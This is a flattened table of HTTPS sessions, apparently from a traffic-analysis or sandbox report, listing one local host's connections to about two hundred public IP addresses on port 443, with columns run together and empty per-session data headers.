                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10541192.168.2.144795694.11.41.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10542192.168.2.1445938193.185.125.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10543192.168.2.1450972166.192.187.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10544192.168.2.1451106133.131.196.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10545192.168.2.1448428103.228.19.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10546192.168.2.143281891.245.244.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10547192.168.2.1442320222.168.52.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10548192.168.2.1454892144.90.53.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10549192.168.2.1439516162.230.242.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10550192.168.2.143475690.171.5.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10551192.168.2.1450588217.64.231.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10552192.168.2.1442100219.215.133.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10553192.168.2.144655675.74.163.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10554192.168.2.145175677.64.54.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10555192.168.2.1460174191.133.168.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10556192.168.2.145358281.73.15.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10557192.168.2.1438704217.13.52.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10558192.168.2.1458748125.178.65.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10559192.168.2.1456980198.41.216.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10560192.168.2.143856212.93.242.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10561192.168.2.145154473.170.240.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10562192.168.2.144753446.171.38.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10563192.168.2.144950488.212.0.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10564192.168.2.1441852166.57.77.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10565192.168.2.1444980108.91.165.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10566192.168.2.1445684108.6.182.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10567192.168.2.1448236197.155.129.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10568192.168.2.1448180158.169.173.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10569192.168.2.143542285.106.133.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10570192.168.2.1452736136.203.110.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10571192.168.2.143715042.147.21.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10572192.168.2.1458314123.167.177.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10573192.168.2.143285683.78.204.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10574192.168.2.14531462.62.41.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10575192.168.2.1438912185.242.103.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10576192.168.2.144931038.77.32.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10577192.168.2.1456058169.226.244.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10578192.168.2.1449508112.41.204.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10579192.168.2.1454374102.126.72.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10580192.168.2.1453134195.27.17.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10581192.168.2.1444138136.21.211.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10582192.168.2.1459116221.184.22.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10583192.168.2.1442528198.84.140.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10584192.168.2.143813665.15.216.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10585192.168.2.1448528139.83.253.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10586192.168.2.145350689.123.45.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10587192.168.2.146058078.230.47.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10588192.168.2.144360646.149.86.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10589192.168.2.1445214134.125.145.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10590192.168.2.145445894.122.65.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10591192.168.2.1459192200.7.119.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10592192.168.2.144707069.17.17.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10593192.168.2.1455130190.255.6.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10594192.168.2.144731617.157.87.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10595192.168.2.1446656125.34.203.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10596192.168.2.145772042.30.89.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10597192.168.2.1441198148.139.67.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10598192.168.2.1439618181.201.169.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10599192.168.2.144811662.85.158.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10600192.168.2.1438242134.165.74.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10601192.168.2.1457152185.111.210.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10602192.168.2.1454824103.138.106.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10603192.168.2.1435446109.61.214.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10604192.168.2.144791254.84.29.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10605192.168.2.1453198130.135.21.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10606192.168.2.1449586156.190.17.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10607192.168.2.143846695.199.32.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10608192.168.2.145271285.123.19.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10609192.168.2.1457170140.254.102.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10610192.168.2.1454044200.105.21.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10611192.168.2.1453266162.15.107.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10612192.168.2.1451150137.252.188.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10613192.168.2.1450550138.181.36.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10614192.168.2.144083424.48.17.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10615192.168.2.145621250.105.199.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10616192.168.2.1444130129.169.247.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10617192.168.2.1436418194.96.36.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10618192.168.2.145796862.193.103.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10619192.168.2.143666067.12.75.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10620192.168.2.1445240184.71.10.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10621192.168.2.1458550208.50.68.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10622192.168.2.1449434120.0.1.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10623192.168.2.145529844.111.150.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10624192.168.2.143867469.217.180.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10625192.168.2.1439270117.149.195.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10626192.168.2.144267014.193.90.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10627192.168.2.144286647.6.31.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10628192.168.2.1441696158.94.244.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10629192.168.2.1444402222.189.100.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10630192.168.2.1460152199.79.129.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10631192.168.2.1435702172.173.203.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10632192.168.2.144528695.231.241.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10633192.168.2.1435480116.50.0.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10634192.168.2.143860039.40.146.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10635192.168.2.1449854149.125.221.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10636192.168.2.1455392135.169.21.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10637192.168.2.145241097.107.127.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10638192.168.2.1450076149.127.204.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10639192.168.2.1448712179.209.95.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10640192.168.2.145846619.14.172.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10641192.168.2.1441696111.7.197.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10642192.168.2.1442684102.95.193.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10643192.168.2.145223478.226.119.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10644192.168.2.1439990168.191.246.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10645192.168.2.1457392152.67.205.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10646192.168.2.1434364199.159.143.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10647192.168.2.1460396114.188.143.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10648192.168.2.1452936169.11.213.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10649192.168.2.1438592111.85.30.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10650192.168.2.144599857.158.165.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10651192.168.2.1456424102.25.141.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10652192.168.2.1443186219.42.20.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10653192.168.2.1432922202.77.167.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10654192.168.2.1438682145.24.5.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10655192.168.2.1452626207.131.121.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10656192.168.2.1443410182.24.179.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10657192.168.2.14507568.49.145.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10658192.168.2.1440822218.189.197.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10659192.168.2.1453600116.24.245.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10660192.168.2.145612476.80.185.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10661192.168.2.14507284.176.46.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10662192.168.2.144952699.228.82.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10663192.168.2.145567059.226.15.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10664192.168.2.145242050.214.164.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10665192.168.2.144033068.108.86.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10666192.168.2.143310289.59.66.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10667192.168.2.143474888.121.171.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10668192.168.2.1443304186.59.48.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10669192.168.2.145332492.241.58.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10670192.168.2.145648418.200.98.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10671192.168.2.1449596189.107.154.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10672192.168.2.1442180146.187.186.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10673192.168.2.1459118179.206.155.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10674192.168.2.1447096199.79.146.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10675192.168.2.1453676159.192.159.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10676192.168.2.145648017.216.70.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10677192.168.2.1438252211.156.247.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10678192.168.2.144721479.144.58.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10679192.168.2.1451098175.43.61.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10680192.168.2.1437162198.9.89.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10681192.168.2.144435075.195.29.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10682192.168.2.144675682.167.254.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10683192.168.2.14440488.202.36.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10684192.168.2.143596617.43.35.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10685192.168.2.1452184148.193.212.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10686192.168.2.1442602174.18.228.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10687192.168.2.1457806177.173.13.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10688192.168.2.145165868.29.242.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10689192.168.2.1460504209.143.0.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10690192.168.2.145215469.244.226.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10691192.168.2.1437308147.16.42.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10692192.168.2.143904683.188.114.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10693192.168.2.1447066208.82.141.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10694192.168.2.1451694124.40.84.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10695192.168.2.1459566204.222.223.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10696192.168.2.1456862213.45.213.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10697192.168.2.145065694.43.7.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10698192.168.2.1447524133.177.29.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10699192.168.2.143524282.208.14.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10700192.168.2.1433954213.47.168.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10701192.168.2.143905646.75.252.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10702192.168.2.144485893.160.43.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10703192.168.2.1453688144.8.206.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10704192.168.2.1447520181.99.141.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10705192.168.2.143455266.242.21.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10706192.168.2.144026291.218.161.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10707192.168.2.1434458131.215.161.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10708192.168.2.143642250.254.90.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10709192.168.2.1444008124.110.240.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10710192.168.2.1449610144.181.62.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10711192.168.2.144254061.79.142.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10712192.168.2.1444760158.148.233.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10713192.168.2.1441760192.208.57.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10714192.168.2.143876823.240.157.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10715192.168.2.144701647.170.18.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10716192.168.2.145096061.32.70.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10717192.168.2.1435208161.21.144.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10718192.168.2.1458800147.11.40.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10719192.168.2.144648265.62.56.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10720192.168.2.145191635.35.224.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10721192.168.2.14438281.254.40.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10722192.168.2.1435220139.57.117.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10723192.168.2.1435230124.107.189.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10724192.168.2.1452470192.189.8.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10725192.168.2.1451048149.112.111.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10726192.168.2.144387890.68.151.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10727192.168.2.1434846204.171.158.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10728192.168.2.1442046115.196.74.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10729192.168.2.144114888.161.120.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10730192.168.2.1437880169.139.6.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10731192.168.2.1438830185.54.2.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10732192.168.2.1457344184.136.251.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10733192.168.2.144364858.176.16.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10734192.168.2.144720667.66.73.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10735192.168.2.145553473.8.68.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10736192.168.2.1451734133.226.73.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10737192.168.2.145837873.80.145.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10738192.168.2.1434630131.220.179.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10739192.168.2.144879076.76.52.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10740192.168.2.145913842.187.157.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10741192.168.2.145737253.13.26.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10742192.168.2.144335627.70.192.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10743192.168.2.1442758111.87.242.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10744192.168.2.145139870.125.86.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10745192.168.2.145778059.41.168.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10746192.168.2.143794213.44.182.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10747192.168.2.1455874109.47.127.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10748192.168.2.1438478174.255.74.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10749192.168.2.144677487.32.152.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10750192.168.2.1441038114.52.137.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10751192.168.2.1451174124.66.247.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10752192.168.2.1433586196.48.211.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10753192.168.2.1448728207.13.226.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10754192.168.2.1439588116.18.2.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10755192.168.2.144371667.144.102.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10756192.168.2.145799836.82.72.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10757192.168.2.1440020193.149.185.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10758192.168.2.143629898.40.200.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10759192.168.2.145342052.178.18.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10760192.168.2.143398244.226.142.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10761192.168.2.1454776168.167.92.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
